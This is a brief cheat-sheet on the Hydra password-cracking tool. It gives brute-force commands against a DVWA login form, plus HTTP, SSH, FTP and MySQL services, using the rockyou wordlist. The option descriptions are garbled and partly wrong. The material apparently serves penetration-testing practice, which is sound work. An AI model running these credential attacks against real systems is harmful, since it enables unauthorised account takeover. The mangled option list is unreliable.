To launch password attacks in forms using http-post-form
and injecting the variables like ^USER^
. The data in the request can be obtained using Chrome dev tools or Burpsuite
.
hydra -l admin -P /usr/share/jonh/password.lst 10.0.2.6 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&login=Login:Login failed" -f
The options are:
-u
username-L
user list-p
password-P
passwordList-f
exit at the first successful result server, where to attack servicet
number of threads to run in parallelhttp-post-form
service.Another example with http-get
hydra -l admin -P pass.txt $TARGET http-get /webdav
We use the ssh
service.
hydra -l root -P /usr/share/wordlists/rockyou.txt.gz $TARGET ssh
hydra -t 4 -l Mike -P /usr/share/wordlists/rockyou.txt -vV $TARGET ftp
hydra -t 4 -l root -P /usr/share/wordlists/rockyou.txt $TARGET mysql